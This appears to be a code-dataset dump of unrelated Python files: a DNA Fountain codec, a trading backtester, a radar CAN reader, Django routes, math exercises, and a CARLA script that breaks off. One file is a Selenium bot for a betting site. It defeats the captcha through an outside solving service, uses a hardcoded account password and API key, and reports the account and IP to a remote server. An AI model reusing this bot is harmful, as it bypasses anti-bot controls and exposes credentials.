seed to a list of 4bytes HARD CODED!!!\n # adds the seed to the data (list of integers)\n # computes a reed solomon on the seed+data.\n # returns everything.\n\n seed_ord = self.seed.to_bytes(4, byteorder='big')\n # converting the seed into exectly four bytes.\n message = seed_ord + bytes(self.data)\n\n if self.rs > 0:\n message = self.rs_obj.encode(message) # adding RS symbols to the message\n\n return message\n\n\n# ----------------------------------------------------Fountain-------------------------------------------------#\nclass DNAFountain:\n\n def __init__(self,\n file_in,\n alpha,\n stop=None,\n rs=0,\n c_dist=0.1,\n delta=0.5,\n scanner=None\n ):\n\n # alpha is the redundency level\n # stop is whether we have a limit on the number of oligos\n # chunk_size and file_size are in bytes\n # rs is the 
number of bytes for reed-solomon error correcting code over gf(2^8).\n # c_dist is a parameter of the degree distribution\n # delta is a parameter of the degree distribution\n # np: should we use numpy random number generator? Faster, but incompatible for previous versions\n # max_homopolymer: the largest homopolymer allowed\n # gc: the allowable range of gc +- 50%\n\n # data:\n self.file_in = file_in\n self.chunk_size = len(file_in[0])\n self.num_chunks = len(file_in)\n\n # reduancy:\n self.alpha = alpha\n self.stop = stop\n self.final = self.calc_stop()\n\n # random mnumber generator\n self.lfsr = lfsr(lfsr32s(), lfsr32p()) # starting an lfsr with a certain state and a polynomial for 32bits.\n self.lfsr_l = len('{0:b}'.format(lfsr32p())) - 1 # calculate the length of lsfr in bits\n self.seed = self.lfsr.__next__()\n\n self.PRNG = PRNG(K=self.num_chunks, delta=delta, c=c_dist, np=np) # creating the solition distribution object\n self.PRNG.set_seed(self.seed)\n\n # error correcting code:\n self.rs = rs # the number of symbols (bytes) to add\n self.rs_obj = RSCodec(self.rs) # initalizing an reed solomon object\n\n # biological screens:\n self.scanner = scanner\n if self.scanner == None:\n self.scanner = Scanner()\n\n self.tries = 0 # number of times we tried to create a droplet\n self.good = 0 # droplets that were screened successfully.\n\n self.oligo_l = self.calc_oligo_length()\n # store the generated droplets\n self.dna_df = None\n self.dna_dl = []\n\n def calc_oligo_length(self):\n # return the number of nucleotides in an oligo:\n bits = self.chunk_size * 8 + self.lfsr_l + self.rs * 8\n return bits / 4\n\n def calc_stop(self):\n if self.stop is not None:\n return self.stop\n stop = int(self.num_chunks * (1 + self.alpha)) + 1\n return stop\n\n def droplet(self):\n # creating a droplet.\n data = None\n\n d, num_chunks = self.rand_chunk_nums() # creating a random list of segments.\n\n for num in num_chunks: # iterating over each segment\n if data is None: # first round. data payload is empty.\n data = self.chunk(num) # just copy the segment to the payload.\n else: # more rounds. 
Xor the new segments with the payload.\n data = xor(data, self.chunk(num)) # map(operator.xor, data, self.chunk(num))\n\n self.tries += 1\n\n # we have a droplet:\n return Droplet(data=data,\n seed=self.seed,\n rs=self.rs,\n rs_obj=self.rs_obj,\n num_chunks=num_chunks,\n degree=d)\n\n def chunk(self, num):\n # return the num-th segment from the file\n return self.file_in[num]\n\n # -------------------generate random chunk numebers----------------#\n def updateSeed(self):\n # This function creates a fresh seed for the droplet and primes the solition inverse cdf sampler\n self.seed = self.lfsr.__next__() # deploy one round of lfsr, and read the register.\n self.PRNG.set_seed(self.seed) # update the seed with the register\n\n def rand_chunk_nums(self):\n # This funcation returns a subset of segments based on the solition distribution.\n # It updates the lfsr to generates a new seed.\n self.updateSeed() # get a fresh seed and prime the solition inverse cdf sampler.\n blockseed, d, ix_samples = self.PRNG.get_src_blocks_wrap()\n return d, ix_samples # return a list of segments.\n\n # ----------------screen generated droplets----------------------#\n def screen(self, droplet):\n if self.scanner.Pass(droplet.toDNA()):\n self.good += 1\n dna = droplet.toDNA()\n degree = droplet.degree\n chunk_str = droplet.chunkStr()\n self.dna_dl.append([dna, self.seed, degree, chunk_str])\n return 1\n return 0\n\n def save(self, file_name='encode_result.dna', ori_file_name=None):\n with open(file_name, 'w') as f:\n dic = {\n 'Encoding': 'DNA Fountain',\n 'Chunk Nums': self.num_chunks,\n 'Chunk Size': self.chunk_size,\n 'rs': self.rs\n }\n if ori_file_name != None:\n dic['file name'] = ori_file_name\n f.write(json.dumps(dic) + '\\n')\n f.writelines('\\n'.join([d[0] for d in self.dna_dl]))\n f.close()\n\n def encode(self, data):\n process = 0\n self.dl = []\n self.tries = 0\n self.good = 0\n while self.good < self.final:\n self.screen(self.droplet())\n if self.tries % 2000 == 0:\n logging.info(\"generate %d chunks after %d tries\", self.good, self.tries)\n if self.good % 10 == 0:\n process = int((self.good / self.final) * 100)\n print(process)\n logging.info(\"Finish generating %d chunks after %d tries\", self.good, self.tries)\n return self.dna_dl\n\n # ----------------------------------------------------Glass-------------------------------------------------#\n\n\nfrom collections import defaultdict\n\n\nclass Glass:\n def __init__(self, num_chunks, out, header_size=4,\n rs=0, c_dist=0.1, delta=0.5,\n flag_correct=True, gc=0.05, max_homopolymer=3,\n max_hamming=100, decode=True, chunk_size=20, exDNA=False, np=False, truth=None):\n\n self.entries = []\n self.droplets = set()\n self.num_chunks = num_chunks\n self.chunks = [None] * num_chunks\n self.header_size = header_size\n self.decode = decode\n self.chunk_size = chunk_size\n self.exDNA = exDNA\n self.np = np\n self.chunk_to_droplets = defaultdict(set)\n self.done_segments = set()\n self.truth = truth\n self.out = out\n self.max_hamming = max_hamming\n\n self.PRNG = PRNG(K=self.num_chunks, delta=delta, c=c_dist, np=np)\n\n self.rs = rs\n self.RSCodec = None\n self.correct = flag_correct\n self.seen_seeds = set()\n\n self.debug_droplets = []\n if self.rs > 0:\n self.RSCodec = RSCodec(rs)\n\n def add_dna(self, dna_string):\n # header_size is in bytes\n\n # data = dna_to_byte(dna_string)\n\n data = dna_to_byte(dna_string)\n\n if self.rs > 0:\n # there is an error correcting code\n if self.correct: # we want to evaluate the error correcting code\n try:\n 
data_corrected = list(self.RSCodec.decode(data))\n except:\n logging.debug('can not correct ori data')\n return -1, None # could not correct the code\n\n # we will encode the data again to evaluate the correctness of the decoding\n data_again = list(self.RSCodec.encode(data_corrected)) # list is to convert byte array to int\n\n if np.count_nonzero(data != list(\n data_again)) > self.max_hamming: # measuring hamming distance between raw input and expected raw input\n # too many errors to correct in decoding\n logging.debug('too many errors!')\n logging.info('rs died')\n return -1, None\n\n else: # we don't want to evaluate the error correcting code (e.g. speed)\n data_corrected = data[0:len(data) - self.rs] # just parse out the error correcting part\n\n else:\n data_corrected = data\n\n seed_array = data_corrected[:self.header_size]\n seed = sum([int(x) * 256 ** i for i, x in enumerate(seed_array[::-1])])\n payload = data_corrected[self.header_size:]\n\n self.add_seed(seed)\n\n if self.decode:\n self.PRNG.set_seed(seed)\n blockseed, d, ix_samples = self.PRNG.get_src_blocks_wrap()\n d = Droplet(payload, seed, ix_samples)\n self.addDroplet(d)\n self.debug_droplets.append(deepcopy(d))\n\n return seed, data\n\n def addDroplet(self, droplet):\n\n self.droplets.add(droplet)\n for chunk_num in droplet.num_chunks:\n self.chunk_to_droplets[chunk_num].add(droplet) # we document for each chunk all connected droplets\n # logging.debug(''.join(map(chr,droplet.data)))\n self.updateEntry(droplet) # one round of message passing\n\n def updateEntry(self, droplet):\n\n # removing solved segments from droplets\n for chunk_num in (droplet.num_chunks & self.done_segments):\n droplet.data = xor(droplet.data, self.chunks[chunk_num])\n # subtract (ie. xor) the value of the solved segment from the droplet.\n droplet.num_chunks.remove(chunk_num)\n # cut the edge between droplet and input segment.\n self.chunk_to_droplets[chunk_num].discard(droplet)\n # cut the edge between the input segment to the droplet\n # solving segments when the droplet have exactly 1 segment\n if len(droplet.num_chunks) == 1: # the droplet has only one input segment\n lone_chunk = droplet.num_chunks.pop()\n\n # logging.info(\"\\nlone chunk appear: index %d\",lone_chunk)\n # logging.info(''.join(map(chr,droplet.data)))\n\n self.chunks[lone_chunk] = droplet.data # assign the droplet value to the input segment (=entry[0][0])\n # print(self.chunks)\n self.done_segments.add(lone_chunk) # add the lone_chunk to a data structure of done segments.\n if self.truth:\n self.check_truth(droplet, lone_chunk)\n self.droplets.discard(droplet) # cut the edge between the droplet and input segment\n self.chunk_to_droplets[lone_chunk].discard(\n droplet) # cut the edge between the input segment and the droplet\n\n # update other droplets\n for other_droplet in self.chunk_to_droplets[lone_chunk].copy():\n self.updateEntry(other_droplet)\n\n def String(self):\n # return ''.join(x or ' _ ' for x in self.chunks)\n res = ''\n for x in self.chunks:\n res += ''.join(map(chr, x))\n return res\n\n def StringNoPadding(self):\n return self.String().rstrip('\\0')\n\n def removePadding(self):\n crp = []\n for b in self.chunks[-1]:\n if 0 == b:\n break\n crp.append(b)\n self.chunks[-1] = crp\n return crp\n\n def Save(self, file_name):\n self.removePadding()\n with open(file_name, 'wb') as f:\n for c in self.chunks:\n f.write(bytes(c))\n logging.info('saved')\n f.close()\n\n def reDNA(self):\n self.removePadding()\n dna = byte_to_dna(self.binString())\n return dna\n\n def 
binString(self):\n bs = b''\n for c in self.chunks:\n bs += bytes(c)\n return bs\n\n def print_chunks(self):\n print(self.chunks)\n\n def display_chunks(self):\n i = 0\n not_none = []\n for x in self.chunks:\n print(i, ''.join(map(chr, x)))\n i += 1\n if x != None:\n not_none.append(i)\n return not_none\n\n def check_truth(self, droplet, chunk_num):\n try:\n truth_data = self.truth[chunk_num]\n except:\n print(\"Error. chunk:\", chunk_num, \" does not exist.\")\n quit(1)\n\n if not droplet.data == truth_data:\n # error\n print(\"Decoding error in \", chunk_num, \".\\nInput is:\", truth_data, \"\\nOutput is:\", droplet.data, \"\\nDNA:\",\n droplet.to_human_readable_DNA(flag_exDNA=False))\n quit(1)\n else:\n # print chunk_num, \" is OK. \", self.chunksDone, \" are done\"\n return 1\n\n def add_seed(self, seed):\n self.seen_seeds.add(seed)\n\n def len_seen_seed(self):\n return len(self.seen_seeds)\n\n def isDone(self):\n if self.num_chunks - len(self.done_segments) > 0:\n return None\n return True\n\n def chunksDone(self):\n return len(self.done_segments)\n\n def seed_test(self, seed):\n self.PRNG.set_seed(seed)\n blockseed, d, ix_samples = self.PRNG.get_src_blocks_wrap()\n print(ix_samples)\n\n\ndef FT_decode(in_file_name): # /**/\n # @title decode\n process = 0\n logging.getLogger().setLevel(logging.INFO)\n f = open(in_file_name, 'r')\n json_para = f.readline()\n dic = json.loads(json_para)\n chunk_num = dic['Chunk Nums']\n chunk_size = dic['Chunk Size']\n rs = dic['rs']\n\n g = Glass(chunk_num, '', rs=rs)\n line = 0\n errors = 0\n solve_num = []\n seen_seeds = defaultdict(int)\n\n while True:\n # read one dna in dna\n try:\n dna = f.readline().rstrip('\\n')\n except:\n logging.info(\"After reading %d lines, %d chunks are done. So far: %d rejections (%f) %d barcodes\", line,\n g.chunksDone(), errors, errors / (line + 0.0), g.len_seen_seed())\n logging.info(\"Finished reading input file!\")\n return -1\n if len(dna) == 0:\n logging.info(\"Finished reading input file!\")\n return -1\n\n line += 1\n seed, data = g.add_dna(dna)\n\n if seed == -1: # reed-solomon error!\n errors += 1\n print('rs error at', line)\n else:\n seen_seeds[seed] += 1\n\n if line % 10 == 0:\n logging.info(\"After reading %d lines, %d chunks are done. So far: %d rejections (%f) %d barcodes\", line,\n g.chunksDone(), errors, errors / (line + 0.0), g.len_seen_seed())\n process = int(100 * g.chunksDone() / chunk_num)\n print(process)\n pass\n solve_num.append(g.chunksDone())\n\n if g.isDone():\n logging.info(\"After reading %d lines, %d chunks are done. 
So far: %d rejections (%f) %d barcodes\", line,\n g.chunksDone(), errors, errors / (line + 0.0), g.len_seen_seed())\n logging.info(\"Done!\")\n f.close()\n return g, solve_num, True\n return g, solve_num, False\n","sub_path":"igem/BackEnd/FT_class.py","file_name":"FT_class.py","file_ext":"py","file_size_in_byte":16823,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"510991617","text":"def data1(m,x):\n lenth=len(x)\n res=0\n for i in range(lenth):\n res+=int(list1.index(x[i]))*m**(lenth-1-i)\n return res\nlist1=['0','1','2','3','4','5','6','7','8','9',\n 'A','B','C','D','E','F',\n 'G','H','I','J','K','L',\n 'M','N','O','P','Q','R',\n 'S','T','U','V','W','X',\n 'Y','Z']\n\n\ndef root(x , y , k) :\n temp = 1\n while y :\n # 相当于y%2\n if y & 1 == 1 : # 当是奇数时\n temp = (temp * x) % k\n x = (x * x) % k\n y = y >> 1\n temp = temp if temp else k\n return temp\n\n\nif __name__ == '__main__' :\n while True :\n try :\n x , y , k = map(int , input().strip().split())\n print(root(x , y , k - 1))\n\n except :\n break","sub_path":"小样/进制转换.py","file_name":"进制转换.py","file_ext":"py","file_size_in_byte":762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"78696506","text":"# -*- coding: utf-8 -*-\nimport logging\nfrom typing import List\n\nimport pandas as pd\n\nfrom zvt.domain import SecurityType, TradingLevel\nfrom zvt.selectors.selector import TargetSelector\nfrom zvt.trader import TradingSignal, TradingSignalType\nfrom zvt.trader.account import SimAccountService\nfrom zvt.utils.time_utils import to_pd_timestamp\n\n\nclass SelectorsComparator(object):\n\n def __init__(self, limit=10) -> None:\n self.selectors: List[TargetSelector] = []\n self.limit = limit\n\n def add_selector(self, selector):\n \"\"\"\n\n :param selector:\n :type selector: TargetSelector\n \"\"\"\n self.selectors.append(selector)\n\n def add_selectors(self, selectors):\n \"\"\"\n\n :param selectors:\n :type selectors: List[TargetSelector]\n \"\"\"\n self.selectors += selectors\n\n def make_decision(self, timestamp):\n df = pd.DataFrame()\n for selector in self.selectors:\n df = df.append(selector.get_targets(timestamp))\n if not df.empty:\n df = df.sort_values(by=['security_id', 'score'])\n if len(df.index) > self.limit:\n df = df.iloc[list(range(self.limit)), :]\n return df\n\n\nclass Trader(object):\n logger = logging.getLogger(__name__)\n\n # overwrite it to custom your trader\n selectors_comparator = SelectorsComparator(limit=10)\n\n def __init__(self, security_type=SecurityType.stock, exchanges=['sh', 'sz'], codes=None,\n start_timestamp=None,\n end_timestamp=None) -> None:\n\n self.trader_name = type(self).__name__.lower()\n self.trading_signal_listeners = []\n self.state_listeners = []\n\n self.selectors: List[TargetSelector] = None\n\n self.security_type = security_type\n self.exchanges = exchanges\n self.codes = codes\n\n if start_timestamp and end_timestamp:\n self.start_timestamp = to_pd_timestamp(start_timestamp)\n self.end_timestamp = to_pd_timestamp(end_timestamp)\n else:\n assert False\n\n self.account_service = SimAccountService(trader_name=self.trader_name,\n timestamp=self.start_timestamp)\n\n self.add_trading_signal_listener(self.account_service)\n\n self.init_selectors(security_type=self.security_type, exchanges=self.exchanges, codes=self.codes,\n start_timestamp=self.start_timestamp, end_timestamp=self.end_timestamp)\n\n self.selectors_comparator.add_selectors(self.selectors)\n\n def init_selectors(self, 
security_type, exchanges, codes, start_timestamp, end_timestamp):\n \"\"\"\n implement this to init selectors\n\n :param security_type:\n :type security_type:\n :param exchanges:\n :type exchanges:\n :param codes:\n :type codes:\n :param start_timestamp:\n :type start_timestamp:\n :param end_timestamp:\n :type end_timestamp:\n \"\"\"\n raise NotImplementedError\n\n def add_trading_signal_listener(self, listener):\n if listener not in self.trading_signal_listeners:\n self.trading_signal_listeners.append(listener)\n\n def remove_trading_signal_listener(self, listener):\n if listener in self.trading_signal_listeners:\n self.trading_signal_listeners.remove(listener)\n\n def run(self):\n # now we just support day level\n for timestamp in pd.date_range(start=self.start_timestamp, end=self.end_timestamp,\n freq='B').tolist():\n\n self.account_service.on_trading_open(timestamp)\n\n account = self.account_service.latest_account\n current_holdings = [position['security_id'] for position in account['positions']]\n\n df = self.selectors_comparator.make_decision(timestamp=timestamp)\n\n selected = set()\n if not df.empty:\n selected = set(df['security_id'].to_list())\n\n if selected:\n # just long the security not in the positions\n longed = selected - set(current_holdings)\n if longed:\n position_pct = 1.0 / len(longed)\n order_money = account['cash'] * position_pct\n\n for security_id in longed:\n trading_signal = TradingSignal(security_id=security_id,\n the_timestamp=timestamp,\n trading_signal_type=TradingSignalType.trading_signal_open_long,\n trading_level=TradingLevel.LEVEL_1DAY,\n order_money=order_money)\n for listener in self.trading_signal_listeners:\n listener.on_trading_signal(trading_signal)\n\n shorted = set(current_holdings) - selected\n\n for security_id in shorted:\n trading_signal = TradingSignal(security_id=security_id,\n the_timestamp=timestamp,\n trading_signal_type=TradingSignalType.trading_signal_close_long,\n position_pct=1.0,\n trading_level=TradingLevel.LEVEL_1DAY)\n for listener in self.trading_signal_listeners:\n listener.on_trading_signal(trading_signal)\n\n self.account_service.on_trading_close(timestamp)\n","sub_path":"zvt/trader/trader.py","file_name":"trader.py","file_ext":"py","file_size_in_byte":5621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"24557163","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nlast mod 12/3/17 wide-range mode on\n\nfunction to call: get(timeout in seconds)\noutput: list of two-element x-y tuples\n\nIf run on its own, plots detected points\n\"\"\"\nfrom multiprocessing import Process, Queue\nfrom math import cos, sin\nimport cantools\nimport prototype.sensors.canlib as canlib\n\n# the .dbc file is a translator for CAN messages\nmy_folder = __file__[:-14] if __file__[-3:]=='.py' else __file__[:-15]\ndb = cantools.db.load_file(my_folder + 'proprietary/radar_can_defs.dbc')\ninitialize_msg = db.messages[126]\ninitialize_params = initialize_msg.decode([0]*8)\ninitialize_params['CAN_RX_RADAR_CMD_RADIATE'] = 'On'\ninitialize_params['CAN_RX_MAXIMUM_TRACKS'] = 64\n# if Filtered, will delete and merge detections by Delphi's rules\n# in my experience, this results in limited accuracy\ninitialize_params['CAN_RX_RAW_DATA_ENABLE'] = 'Raw'#'Filtered'#\n# if On, only use long-and-narrow beam\ninitialize_params['CAN_RX_LR_ONLY_TRANSMIT'] = 'Off'#'On'#\n\n\n\"\"\" This is a shortened version of the code used by 2016's senior design\nteam. 
I imagine they got the original from Delphi or AutonomouStuff at some point.\nThe code has been shortened to only gather object location information, \nnamely range, angle, range rate (speed toward/from self) and lateral rate\"\"\"\nclass Radar(Process):\n \"\"\" Listens for new Radar messages over CAN and parses for the dispatcher.\n\n This parser reads messages from the CAN Bus using the Kvaser USB Python SDK\n and formats Radar information into a python object. Then we send the data\n along to the event dispatcher.\n \"\"\"\n def __init__(self, filename=None): # filename is unused; default added so the bare Radar() call below works\n Process.__init__(self)\n self.queue = Queue()\n \n self.init_params = initialize_params\n self.init_msg = initialize_msg\n cl = canlib.canlib()\n self.ch1 = cl.openChannel(0, canlib.canOPEN_ACCEPT_VIRTUAL)\n \n \n def __enter__(self):\n return self.queue\n \n def terminate(self):\n self.ch1.busOff()\n self.ch1.close()\n self.queue.close()\n super(Radar, self).terminate()\n \n def __exit__(self, errtype=None, errval=None, traceback=None):\n self.terminate()\n\n def run(self):\n print(\"Using channel: %s, EAN: %s\" % (\n self.ch1.getChannelData_Name(), self.ch1.getChannelData_EAN()))\n\n self.ch1.setBusOutputControl(canlib.canDRIVER_NORMAL)\n self.ch1.setBusParams(canlib.canBITRATE_500K)\n self.ch1.busOn()\n\n # Initialize the Radar\n self.ch1.writeWait(self.init_msg.frame_id,\n self.init_msg.encode(self.init_params), 8, 1000)\n\n points = []\n \n while True:\n msgId, msg, dlc, flg, msgtime = self.ch1.read(1000)\n\n if msgId >= 1280 and msgId <= 1343:\n output = db.decode_message(msgId, msg)\n if output['CAN_TX_TRACK_RANGE'] == 0: continue\n angle_rad = -.01745 * output['CAN_TX_TRACK_ANGLE']\n points.append((output['CAN_TX_TRACK_RANGE']*cos(angle_rad),\n output['CAN_TX_TRACK_RANGE']*sin(angle_rad)))\n \n elif msgId == 1248:\n self.queue.put(tuple(points))\n points = []\n \n\n\n\nif __name__ == '__main__':\n # plot radar points\n import numpy as np\n import cv2\n \n size = 320\n distance = 20.\n \n base_image = np.zeros((size*2, size*2, 3), dtype=np.uint8) + 255\n base_image[size-5:size+5, size-5:size+5] = [230,230,230]\n class Display():\n def __init__(self): pass\n def __enter__(self):\n cv2.imshow('lidar side detections', base_image)\n cv2.waitKey(5)\n return self\n def __exit__(self, a, b, c): cv2.destroyWindow('lidar side detections')\n def display(self, image):\n cv2.imshow('lidar side detections', image)\n cv2.waitKey(5)\n \n color = (0,0,0)\n \n offsets = ((-1,0),(1,0),(0,-1),(0,1),(0,0))\n \n with Radar() as lidar, Display() as display:\n while True:\n cloud = lidar.get()\n \n cloud = np.array(cloud)\n cloud *= -size/distance\n cloud[:,0] += size*2\n cloud[:,1] += size\n include = np.all((cloud>=0) & (cloud < size*2), axis=1)\n cloud = cloud[include].astype(int)\n img = base_image.copy()\n for offx, offy in offsets:\n img[cloud[:,0]+offx, cloud[:,1]+offy] = color\n display.display(img)\n","sub_path":"Prototype/sensors/delphiRadar.py","file_name":"delphiRadar.py","file_ext":"py","file_size_in_byte":4586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"603990699","text":"from django.conf.urls import url\nfrom . 
import views\n \nurlpatterns = [\n    url(r'^$', views.index),\n    url(r'^authors$', views.auth),\n    url(r'^add_book$', views.add_book),\n    url(r'^books/(?P<id>\\d+)$', views.view_book),\n    url(r'^auth_book$', views.auth_to_book),\n    url(r'^add_auth$', views.add_auth),\n    url(r'^authors/(?P<id>\\d+)$', views.view_author),\n    url(r'^book_auth$', views.book_to_auth),\n]","sub_path":"apps/books_authors/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"79741145","text":"# encoding: utf-8\n\nfrom selenium import webdriver\nimport time\nfrom PIL import ImageGrab\nfrom chaojiying import Chaojiying_Client\nimport random\nfrom urllib import request,parse\nimport urllib.request\nimport base64\nimport json\nfrom config_data import deviceall\nimport requests\nimport re\n\nclass filter():\n    sign_up = 'https://890cp2.com'\n\n    def setUp(self):\n        self.device = deviceall[5]  #deviceall[4]\n        print(self.device)\n        pixel_ratio = 3.0\n        mobileEmulation = {\"deviceMetrics\": {\"width\": self.device['width'], \"height\": self.device['height'], \"pixelRatio\": pixel_ratio},\"userAgent\": self.device['ua']}\n        options = webdriver.ChromeOptions()\n        # options.binary_location = \"C:/Users/moxi/Desktop/mychrome/Chrome/chrome.exe\"\n        # chrome_driver_binary = \"chromedriver.exe\"\n        options.binary_location = \"C:/Program Files (x86)/Google\\Chrome/Application/chrome.exe\"  # C:/Users/moxi/Desktop/mychrome/Chrome/chrome.exe\n        chrome_driver_binary = \"chromedriver76.exe\"  # chromedriver.exe\n        options.add_experimental_option('mobileEmulation', mobileEmulation)\n        # self.driver = webdriver.Chrome(executable_path='chromedriver.exe', chrome_options=options)\n        self.driver = webdriver.Chrome(chrome_driver_binary, options=options)\n        self.driver.maximize_window()\n        time.sleep(1)\n        self.driver.get(self.sign_up)\n        self.driver.implicitly_wait(30)\n\n\n    def quit(self):\n        self.driver.quit()\n\n    def verify(self):\n\n        # self.driver.find_element_by_class_name(\"popupNotice_closeBtn___bVSp8\").click()\n        self.driver.find_element_by_xpath('//button[@class=\"popupNotice_closeBtn___bVSp8\"]').click()\n        for i in range(1, 3):\n            self.driver.refresh()\n            time.sleep(5)\n            self.driver.find_element_by_xpath('//button[@type=\"submit\"]').click()\n            # self.driver.find_element_by_class_name(\"barTextButton___G3WVC\").click()\n            self.driver.switch_to.frame(self.driver.find_element_by_xpath(\"//iframe[contains(@src,'/login')]\"))\n\n            username = \"bq09221\"\n            pwd = \"HWIsMRCrbl\"\n            print(\"User:\"+username)\n            print(\"Pwd:\"+pwd)\n\n            time.sleep(1)\n\n            # user = self.driver.find_element_by_xpath('//input[@id=\"username\"]')\n            user = self.driver.find_element_by_id(\"username\")\n            user.clear()\n            user.send_keys(username)\n            # passw = self.driver.find_element_by_xpath('//input[@id=\"password\"]')\n            passw = self.driver.find_element_by_id(\"password\")\n            passw.send_keys(pwd)\n            # code = self.driver.find_element_by_xpath('//input[@id=\"validateCode\"]')\n            code = self.driver.find_element_by_id(\"validateCode\")\n            code.send_keys(\"\")\n\n            time.sleep(1)\n\n            x = self.device['xy']['x']  # 1872\n            y = self.device['xy']['y']  # 688,438\n            w = x + 205  # 275,230\n            h = y + 40  # 50,38\n            size = (x, y, w, h)\n            img = ImageGrab.grab(size)\n            img.save(\"C:/Users/moxi/Downloads/1.png\")  # /Users/iwtay/Downloads/images/1.png\n            # img.show()\n\n            time.sleep(1)\n\n            # chaojiying = Chaojiying_Client('iwtay77', 'Iwt.ay77','ac212bb67ed8fce6a530514d9f478093')  # user center >> software ID: generate one and substitute it for 96001\n            # im = 
open('/Users/iwtay/Downloads/images/1.png', 'rb').read()             # local image file path, substituted for a.jpg; on Windows // is sometimes required\n        # yzm = chaojiying.PostPic(im, 1902)\n        # print(yzm)\n        # time.sleep(5)\n\n            appkey = \"62a8949082d27515eeafbd101b64912a\"\n            with open(\"C:/Users/moxi/Downloads/1.png\", 'rb') as f:\n                base64_data = base64.b64encode(f.read())\n                s = base64_data.decode()\n            # print(s)\n\n            textmob = {\n                \"key\": appkey,\n                \"codeType\": 4006,\n                \"base64Str\": s\n            }\n            textmob = parse.urlencode(textmob).encode(encoding='utf-8')\n            # print(textmob)\n\n            req = urllib.request.Request(url=\"http://op.juhe.cn/vercode/index\", data=textmob)\n            webpage = urllib.request.urlopen(req)\n            html = webpage.read()\n            res = json.loads(html)\n            yzm = str(res[\"result\"])\n            print(yzm)\n\n            code.send_keys(yzm)\n            time.sleep(1)\n            self.driver.find_element_by_xpath('//button[@id=\"submit\"]').click()\n            print(i)\n            if i == 1:\n                time.sleep(2)\n                quit = self.driver.find_elements_by_xpath('//button[@class=\"quickAccessBarBtn___1F1-B\"]')[7]\n                quit.click()\n                time.sleep(1)\n                sure = self.driver.find_element_by_css_selector(\".ant-btn.ant-btn-primary\")  # compound class, so a CSS selector is needed instead of by_class_name\n                if sure:\n                    sure.click()\n                    time.sleep(5)\n            else:\n                break\n\n        time.sleep(2)\n\n        sideNav_list = self.driver.find_elements_by_xpath('//button[@class=\"sideNav_anchor___1D7s9\"]')\n        sideNav = random.choice(sideNav_list)\n        sideNav.click()\n\n        rand = self.driver.find_elements_by_class_name(\"gameCal_ctrlBtn___38COx\")[2]\n        add = self.driver.find_elements_by_css_selector(\".theme1___341L1.undefined.button___3xxsI\")[1]  # compound class string from the original; by_class_name only accepts a single class\n\n        rand.click()\n        add.click()\n\n        rand.click()\n        add.click()\n\n        rand.click()\n        add.click()\n\n        rand.click()\n        add.click()\n\n        rand.click()\n        add.click()\n\n        self.driver.find_element_by_xpath('//button[@data-position=\"bottom\"]').click()\n        time.sleep(3)\n\n        url = \"http://200019.ip138.com/\"\n        req = urllib.request.urlopen(url).read()\n        print(req)\n        theIP = re.findall(r\"\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\", str(req))\n        ip = theIP[0]\n        print(\"your IP Address is: \", ip)\n\n        time.sleep(5)\n\n        betss = self.driver.find_element_by_xpath('//div[@class=\"gameCart_response___T0czT\"]').text\n        # page text means \"bet placed successfully, wishing you a win\"; kept in Chinese so the comparison still matches the site\n        if betss == \"投注成功祝您中奖\":\n            print(\"Bet placed successfully, good luck!\")\n            response = requests.post(\n                f\"http://47.75.184.28/api/imessage-server/imessage-restapi/external/markEmail?email={username}&ip={ip}\")\n            print(response.status_code)\n\n        time.sleep(3)\n\n\n\nif __name__ == \"__main__\":\n    F = filter()\n    F.setUp()\n    F.verify()\n    F.quit()\n\n\n","sub_path":"978Wplay.py","file_name":"978Wplay.py","file_ext":"py","file_size_in_byte":6443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"430524414","text":"import operator\nfrom functools import reduce  # needed on Python 3, where reduce is no longer a builtin\n\ndef f(n):\n    return reduce(operator.mul, range(1, n+1), 1)\n\nl = []\nfor _ in range(int(input())):\n    x = float(input())\n    sinof_x = x - (x**3/f(3)) + (x**5/f(5)) - (x**7/f(7)) + (x**9/f(9))\n    l.append(sinof_x)\n    cosof_x = 1 - (x**2/f(2)) + (x**4/f(4)) - (x**6/f(6)) + (x**8/f(8))\n    l.append(cosof_x)\n\nfor e in l:\n    print(\"%.3f\"%e)\n","sub_path":"trignometrics_ratio.py","file_name":"trignometrics_ratio.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"379355828","text":"import argparse\nimport carla\nimport cv2\nimport logging\nfrom carla import ColorConverter as cc\nimport numpy as np\nimport time\nimport datetime\nimport weakref\nimport math\nimport os\nimport sys\nimport glob\nimport random\nimport pygame\nimport pandas as pd\nfrom PIL import Image\nfrom queue import 
Queue\nfrom queue import Empty\n\nimport carla_vehicle_annotator as cva\n\n\ndef parser():\n argparser = argparse.ArgumentParser(\n description=__doc__)\n argparser.add_argument(\n '--host',\n metavar='H',\n default='127.0.0.1',\n help='IP of the host server (default: 127.0.0.1)')\n argparser.add_argument(\n '-p', '--port',\n metavar='P',\n default=2000,\n type=int,\n help='TCP port to listen to (default: 2000)')\n argparser.add_argument(\n '-n', '--number-of-vehicles',\n metavar='N',\n default=300,\n type=int,\n help='number of vehicles (default: 30)')\n argparser.add_argument(\n '-d', '--number-of-dangerous-vehicles',\n metavar='N',\n default=1,\n type=int,\n help='number of dangerous vehicles (default: 3)')\n argparser.add_argument(\n '--tm-port',\n metavar='P',\n default=8000,\n type=int,\n help='port to communicate with TM (default: 8000)')\n argparser.add_argument(\n '--sync',\n action='store_true',\n default=True,\n help='Synchronous mode execution')\n\n return argparser.parse_args()\n\n\ndef sensor_callback(sensor_data, sensor_queue, sensor_name, world):\n if 'radar' in sensor_name:\n points = np.frombuffer(sensor_data.raw_data,dtype=np.dtype('f4'))\n points = np.reshape(points, (-1, 4))\n # outputImgPath=\"../output/\"\n # filename = 